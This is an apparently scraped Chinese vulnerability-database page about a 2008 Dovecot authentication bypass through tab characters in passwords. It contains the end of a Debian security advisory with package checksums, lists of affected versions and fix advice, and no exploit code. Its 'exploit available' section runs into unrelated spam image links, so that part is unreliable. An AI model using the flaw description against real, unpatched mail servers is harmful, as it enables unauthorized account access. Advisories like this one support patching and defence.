http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_mipsel.deb Size/MD5 checksum: 594912 264c368593a3fe7a9268aadee2ab1292 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_mipsel.deb Size/MD5 checksum: 558832 d2a20bbfe49d234d0f3c7911c17c9bfb powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_powerpc.deb Size/MD5 checksum: 569772 e49cc25c54e4fa88217e0fa555de6039 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_powerpc.deb Size/MD5 checksum: 536000 92330b2d1fa2ae8bf6c1b8f05cea3d59 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_powerpc.deb Size/MD5 checksum: 1212096 e2339d417408e14eba21b28684926a5b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_s390.deb Size/MD5 checksum: 559786 3f7faca1fa56aa29a013068e14e7fada http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_s390.deb Size/MD5 checksum: 1290186 5b8722445aab8b59ba15beae695e7f77 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_s390.deb Size/MD5 checksum: 595498 ad3af123ee9c10dece62ff7cf0e84b35 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_sparc.deb Size/MD5 checksum: 533482 576d0f5a1a733dad01c868095488afcf http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_sparc.deb Size/MD5 checksum: 1108250 1ac8086c83312fec554abd74074cf7b2 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_sparc.deb Size/MD5 checksum: 501514 27d4aa890df60532d0a33167df7af219 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [email protected] Package info: `apt-cache show' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR9sKlL97/wQC1SS+AQIS8Qf/aV1FmLW+On+sucRUCqhiEgjXV92BttV6 J6fcjCkEuh0icV3KRjaJfbkSJbIBOHP+5piXHr2iTf4DqDlGCr5ztaQb/n1Xr9GR EYphV8s+RfyAHO/uj8a0rgDL07eRhZ1AyLi38ARJBh4p3elBJOV/4ZrJbZcsO8Bd wnUAAerEcoFUS8Sz6VN92QoWlsYcGZwL1vbuUCswCwr4OiNjyWggbOz/P0fPd3VW ofiN9Tifg/MVfU6uMbG4g8HTKbrX9ryVc+HgXLwZI/UuYwtXP2r+svn0pEt30XwM EfPdxup0JaOne/AQccbtWF96tHopfMfTf5cbCq5raQ2ELwsNTiuTfA== =nlXo -----END PGP SIGNATURE-----
–
漏洞信息
42979 |
|
| Dovecot passdbs Argument Injection Authentication Bypass | |
–
漏洞描述
–
时间线
2008-03-10 |
Unknow |
| Unknow | Unknow |
–
解决方案
| Upgrade to version 1.0.13 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. |
–
相关参考
–
漏洞作者
| Unknown or Incomplete |
–
漏洞信息
| Dovecot ‘Tab’ Character Password Check Security Bypass Vulnerability | |
Input Validation Error |
28181 |
| Yes | No |
| 2008-03-10 12:00:00 | 2008-10-07 05:58:00 |
The vendor reported this issue. |
|
–
受影响的程序版本
| Ubuntu Ubuntu Linux 7.10 sparc Ubuntu Ubuntu Linux 7.10 powerpc Ubuntu Ubuntu Linux 7.10 i386 Ubuntu Ubuntu Linux 7.10 amd64 Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 S.u.S.E. openSUSE 11.0 S.u.S.E. openSUSE 10.3 S.u.S.E. openSUSE 10.2 rPath rPath Linux 1 Red Hat Fedora 8 Red Hat Fedora 7 Gentoo Linux 2007.0 Gentoo Linux Dovecot Dovecot 1.0.12 Dovecot Dovecot 1.0.11 Dovecot Dovecot 1.0.11 Dovecot Dovecot 1.0.10 Dovecot Dovecot 1.0.9 Dovecot Dovecot 1.0.8 Dovecot Dovecot 1.0.7 Dovecot Dovecot 1.0.6 Dovecot Dovecot 1.0.5 Dovecot Dovecot 1.0.4 Dovecot Dovecot 1.0.3 Dovecot Dovecot 0.99.14 Dovecot Dovecot 0.99.13 Dovecot Dovecot 0.99.13 Dovecot Dovecot 0.99.10 .6 Dovecot Dovecot 1.1rc2 Dovecot Dovecot 1.0.RC9 Dovecot Dovecot 1.0.RC8 Dovecot Dovecot 1.0.RC7 Dovecot Dovecot 1.0.RC6 Dovecot Dovecot 1.0.RC5 Dovecot Dovecot 1.0.RC4 Dovecot Dovecot 1.0.RC3 Dovecot Dovecot 1.0.RC2 Dovecot Dovecot 1.0.RC15 Dovecot Dovecot 1.0.RC14 Dovecot Dovecot 1.0.RC13 Dovecot Dovecot 1.0.RC12 Dovecot Dovecot 1.0.RC11 Dovecot Dovecot 1.0.RC10 Dovecot Dovecot 1.0.rc1 Dovecot Dovecot 1.0.beta3 Dovecot Dovecot 1.0.Beta2 Dovecot Dovecot 1.0 rc29 Dovecot Dovecot 1.0 beta8 Dovecot Dovecot 1.0 beta7 Dovecot Dovecot 1.0 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0 Dovecot Dovecot 1.0.13 Dovecot Dovecot 1.1rc3 |
–
不受影响的程序版本
| Dovecot Dovecot 1.0.13 Dovecot Dovecot 1.1rc3 |
–
漏洞讨论
| Dovecot is prone to a security-bypass vulnerability because the application fails to adequately sanitize user-supplied input. An attacker may exploit this issue to gain unauthorized access the affected application. Successful exploits will compromise the application. Versions prior to Dovecot 1.0.13 and 1.1.rc3 are vulnerable. The vendor states that this issue affects only password databases that have blocking enabled. NOTE: Reports indicate that this issue can be exploited only on versions after Dovecot 1.0.10, which introduced the 'skip_password_check' field. |
–
漏洞利用
|
An attacker can exploit this issue using standard client applications. The following exploit is available: |
![[专辑] 王杰专辑《孤星》《向太阳怒吼》VBR 320k-微慑信息网-VulSee.com](http://www.kimdi.com/music/wj/gx/cover.jpg)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
